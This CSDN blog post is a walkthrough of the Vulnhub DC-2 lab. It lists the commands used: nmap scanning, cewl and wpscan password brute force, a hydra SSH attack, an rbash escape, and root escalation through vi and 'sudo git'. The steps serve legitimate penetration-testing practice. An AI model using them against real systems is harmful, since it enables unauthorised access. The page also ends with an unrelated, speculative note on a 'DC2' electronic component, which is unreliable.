Vulnhub之DC2

于 2024-11-18 10:25:30 发布
阅读量625 收藏 23
点赞数 28
分类专栏: 漏洞复现 文章标签: pip docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57817668/article/details/143845705
版权

信息收集

kali ip

主机发现

靶机地址为 192.168.37.135

端口探测

nmap -sV -sS -p- 192.168.37.135

可以看到靶机开放了80端口 和7744端口 且7744服务为ssh

先访问一下80端口

本地访问不了 会自动跳转到DC-2 应该是给重定向了

修改一下hosts文件

windows在 C:\Windows\System32\drivers\etc下 Linux在 /etc/hosts下

修改后访问靶机80端口

flag1

点击falg 进入网页发现flag1

flag2

这里提示我们需要使用cewl 工具 :你常用的单词表可能不起作用,所以,也许你只需要celw。

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。

cewl工具使用指南

cewl http://dc-2 -w password.txt

密码字典有了 现在来找一下登录框

用dirsearch扫描一下目录

访问一下这个目录

这里我们网站和密码字典都有了还需要账号

这里需要用到一款漏洞扫描工具 wpscan

补充:

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能

wpsan 的使用

wpscan --url http://dc-2 --enumerate u --fore --enumerate | -e [option(s)] 枚举信息 --force | -f 强制让wpscan不要验证目标是否是wordpress u 枚举用户名,默认从1-10

这里扫描出来三个用户 :admin tom jerry

将这三个用户保存到username.txt

使用wpscan 进行爆破账号密码

wpscan --url http://dc-2/ -U username.txt -P passwd.txt --username | -U <username> 指定爆破的用户名

这里暴出了两组密码

直接登录

这里就找到flag2

flag 3

提示:“If you can’t exploit WordPress and take a shortcut, there is another way.Hope you found another entry point.”

如果你不能利用WordPress并走捷径,还有另一种方法。希望你能找到另一个切入点。

这里大概就是说wordpress 找不到其它东西了 提示我们寻找另一个切入点

前面还有7744端口的ssh

这里用上面爆出来的账号和密码去尝试登录ssh

ssh@tom 192.168.37.135 -p 7744 ssh@jerry 192.168.37.135 -p 7744

这里只有tom账户登录上去了

也可以使用hydra 进行爆破

hydra -L username.txt -P password.txt 192.168.37.135 ssh -s 7744 -L 指定用户字典 -P 指定密码字典 -s 指定端口

hydra使用详解

ls 查看当前目录下的文件发现有flag3.txt 使用cat flag.txt 查看一下

发现命令没办法用 被“rbash”限制了

方法一 rbash 绕过

查看环境变量

echo $PATH

使用echo 来绕过rbash

BASH_CMDS[a]=/bin/sh;a export PATH=/bin:/usr/bin:$PATH export SHELL=/bin/bash:$SHELL

cat 查看flag3.txt

可怜的老汤姆老是追杰瑞。也许他应该为他造成的所有压力负责。

方法二 查找可用命名

查看可以使用的命令

ompgen -c

这里有一个vi 我们可以用vi编辑器查看flag3.txt文件

vi flag.txt

flag4

方法一 接上面的方法一

切换到jerry的目录下看看有什么东西

这里有个flag4.txt cat查看一下

大概意思是:很高兴看到你已经走了这么远,但你还没有到家。您仍然需要获得最后的标志(惟一真正有意义的标志!!)。这里没有提示——你现在只能靠自己了。

方法二vi提权 接上面方法二

vi可以用 有一个vi提权

vi 随便打开一个文件 按esc后 再下面添加

先输入:set shell=/bin/sh 再输入 :sehll

部分提权成功

切换到jerry 用户目录下ls查看里面的文件

发现flag4.txt

vi 打开flag4.txt

很高兴看到你已经走了这么远,但你还没有到家。您仍然需要获得最后的标志(惟一真正有意义的标志!!)。这里没有提示——你现在只能靠自己了。

flag5

方法一

切换到jerry用户

这里要用到git提权

git提权

查看不需要密码可以使用的命令

sudo -l

1、sudo git help config #在末行命令模式输入 !/bin/bash 或 !'sh' #完成提权 2、sudo git -p help !/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell

提权成功

切换到root文件夹ls查看发现final-flag.txt 查看final-flag.txt

方法二

先进行rbash绕过 然后su 切换到jerry用户 再进行git提权

Vulnhub靶场实战———DC2
m0_67309561的博客
05-02 434
Vulnhub靶场实战
玩转靶机VulnhubDC2(详细)
weixin_51566481的博客
07-26 1264
dc2,suid提权,rbash逃逸
vulnhub--DC2
weixin_55129870的博客
05-12 1393
环境:kali、DC2靶机 DC2靶机默认桥接模式,开启前改成net模式,保证kali和DC2在同一局域网中。(也可都是桥接模式,我比较习惯net模式) ifconfig查看kaliIP地址:192.168.44.131 查看C段,准备C段扫描,在虚拟机编辑--虚拟网络编辑器中, 得知网段192.168.44.0/24,使用nmap扫描存活主机 nmap -sP 192.168.44.0/24 #扫描IP段的所有IP地址 一般都会扫描出5个存活主机,出去较大的,较小的,得知.
Vulnhub DC2
qq_45746876的博客
08-13 429
Vulnhub DC2靶机学习
Vulnhub-DC-2实战靶场
ierciyuan的博客
10-27 2755
vulnhubdc-2靶场。信息收集、漏洞利用等,详细的分步打靶。
vulnhubDC2
qq_54030686的博客
05-31 278
简述:各位兄弟可移步至https://blog.csdn.net/shuteer_xu/article/details/116141639,直接看这位师傅的即可,本人只当成一个笔记 老三样,主机发现,端口扫描,指纹识别 主机发现 nmap -sS 192.168.43.0/24 全端口扫描 nmap -A -p- 192.168.43.130 共发现 7744为ssh端口处于开放状态,使用hydra进行爆破,使用 hydra -L /opt/user.txt -P /opt/mima.txt ss
靶机实操:vulnhub-DC2
不想当脚本小子的脚本小子
12-01 325
最近练手的就用vulnhub上面的靶机来玩一玩,一来可以锻炼自己的能力,二来可以举一反三,培养自己的思路,在这里我奉劝各位初学者,一定要动手实操,只有在做的过程中才能够记住你所学的东西。话不多说,今天先来DC2.我这里主要是分享我的一些实验过程以及自己的思路与总结。 首先境安装好以后先哐哐哐各来一通: 开放了80,7744端口,对这个7744端口还挺有兴趣,一会看看有没有什么能够自己操作的地方 wapplyzer是一款火狐插件,亲测好用,发现了wordpress,这个时候就想着一会...
Vulnhub系列之DC2靶场详解
weixin_50053818的博客
05-05 1919
TOC {:toc} 环境 DC-1靶场 VMware虚拟机 kali 直接更改域名解析进网站拿flag1 根据目标靶场的MAC地址得出IP为:192.168.31.182,直接上nmap扫描。 可以发现开放了80端口,网页服务器但是可以看出做了域名解析,所以需要在本地即kali的配置文件/etc/hosts文件写入192.168.31.182 dc-2即可完成本地域名解析。还可以看出网站是由WordPress内容管理系统搭建的。 还开放了7744端口,可以知道使用协议是ssh,所以可以远程连接。 .
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 701
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
Vulnhub DC Challenges之 DC-2
ST0new的博客
05-26 2011
前言 关于Vulnhub 以及DC,以及如何使用ova安装,我已经在DC-1中介绍了 ,今天带来第二弹,比第一弹难度稍微大一点,重点还是考察工具的使用和命令的熟练程度 附上链接Vulnhub DC Challenges之 DC-1 DC-2介绍 DC-2,我们主要是从web入手渗透拿到flag,需要大家对信息收集要有一定的了解,需要掌握的工具:nmap,hydra,cewl。 靶机环境 DC-2...
看完这篇 教你玩转渗透测试靶机vulnhub——DC2
Aluxian_的博客
03-22 4405
Vulnhub靶机DC2渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址: ...
Vulnhub靶机:DC2
qq_48904485的博客
02-13 466
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:DC2(10.0.2.55)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/
渗透测试学习之vulnhub系列靶机——DC2
jingzhou_666的博客
06-11 1597
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用。
Vulnhub靶机渗透学习——DC-2
qq_45612828的博客
10-18 408
wpscan工具使用(wordpress 靶场以及实际中非常常见)rbash 逃逸并提权(vi 进入 /bin/sh, 更改环境变量)学会 git 提权。
[Vulnhub] DC-2
weixin_63231007的博客
01-02 697
DC系列靶机-第二弹(hydra爆破+rbash逃逸+git提权)
vulnhub通关-2 DC-2(含靶场资源)
Brucye
02-01 1288
WPScan是一个开源的网络安全工具,专门用于发现WordPress网站中的安全漏洞。BASH_CMD通常不是一个标准的环境变量。不过,如果你在某些脚本或配置文件中看到BASH_CMD,它可能是一个自定义的环境变量用于存储一个bash命令或者命令的路径。这个变量的具体含义和用途取决于它在脚本或配置中的上下文。命令解释:export 用于添加环境变量,su在/bin目录下,所以添加/bin目录。
VulnHub DC2
m0_58564181的博客
07-09 249
VulnHub DC2
Vulnhub-DC-2 靶机复现完整过程
Continuejww的博客
12-13 1266
::文章参考:https://blog.csdn.net/a310034188/article/details/121624538。
vulnhub靶场之DC-2
qq_58091216的博客
01-07 1215
1)我们使用ssh登录账号,用jerry登录半天登录不上去,我们使用tom进行登录,发现可以登录成功,而且看到了flag3.txt。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权。虚拟机开启之后界面如下(和1一样),我们不知道ip,需要自己探活,网段知道:192.168.52.0/24。与DC-1非常相似,DC-2是另一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。添加完成之后,再次访问,访问成功(我们使用kali里面的浏览器)
DC2元器件使用方法
最新发布
03-14
### 关于DC2元器件的使用说明与教程 目前提供的引用材料并未直接提及 **DC2元器件** 的具体定义或其使用方法。然而,可以从其他相关领域推断可能涉及的知识点,并尝试提供一些通用指导。 #### DC2元器件概述 假设这里的“DC2”指的是某种直流(Direct Current, DC)相关的电子组件或模块,则可以根据常见的电子设计原则来推测其用途和操作方式。例如,在许多嵌入式系统开发中,类似于 STM32F103RB 这样的微控制器平台可能会配合某些特定功能的外设工作[^2]。如果 DC2 是一种功率转换设备、驱动电路或是信号调理单元,那么它的基本应用逻辑通常围绕以下几个方面展开: - 输入/输出接口配置; - 参数调节范围设定; - 工作模式切换控制等。 #### 可能的应用场景分析 基于上述提到的一些基础概念——比如二极管的功能特性描述[^1]以及滤波算法实现思路[^3]——我们可以进一步联想出如下几种典型情况适用于讨论对象"DC2": ##### 场景一:作为电源管理部件之一参与整体架构构建 在这种情形下,“DC2”也许代表某类降压变换器(Buck Converter)或者升压变换器(Boost Converter),负责将输入电压调整至适合下游负载需求水平的同时保持效率最优化状态运行。此时需要注意的关键参数包括但不限于开关频率(fsw),占空比(Duty Cycle),反馈环路补偿机制等等因素影响下的动态响应表现如何满足实际项目指标要求。 ```c // 示例代码片段展示简易PWM生成过程 void generate_pwm(int duty_cycle){ TIM_TimeBaseInitTypeDef TIM_InitStruct; RCC_APB1PeriphClockCmd(RCC_APB1Periph_TIM4, ENABLE); TIM_InitStruct.TIM_Period = 999; TIM_InitStruct.TIM_Prescaler = 71; TIM_InitStruct.TIM_ClockDivision = TIM_CKD_DIV1; TIM_InitStruct.TIM_CounterMode = TIM_CounterMode_Up; TIM_TimeBaseInit(TIM4,&TIM_InitStruct); TIM_SetCompare1(TIM4,duty_cycle*10); TIM_Cmd(TIM4,ENABLE); } ``` ##### 场景二:充当传感器采集前端处理节点角色 另一种可能性在于它被用来执行诸如光电隔离放大之类的任务以便更好地获取外部环境变化信息进而作出相应决策动作。这里可以联想到之前有关光照强度监测阈值设置部分所阐述的内容[^4],即通过合理安排检测周期及时长规避外界干扰源造成错误触发现象发生几率提升测量精度可靠性程度。 --- 尽管如此,由于缺乏更确切的产品手册文档支持,以上仅属于理论层面探讨范畴并不能完全覆盖实际情况复杂度差异之处。因此强烈建议查阅官方发布的权威资料获得更为详尽准确的信息来源依据做出最终判断结论!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值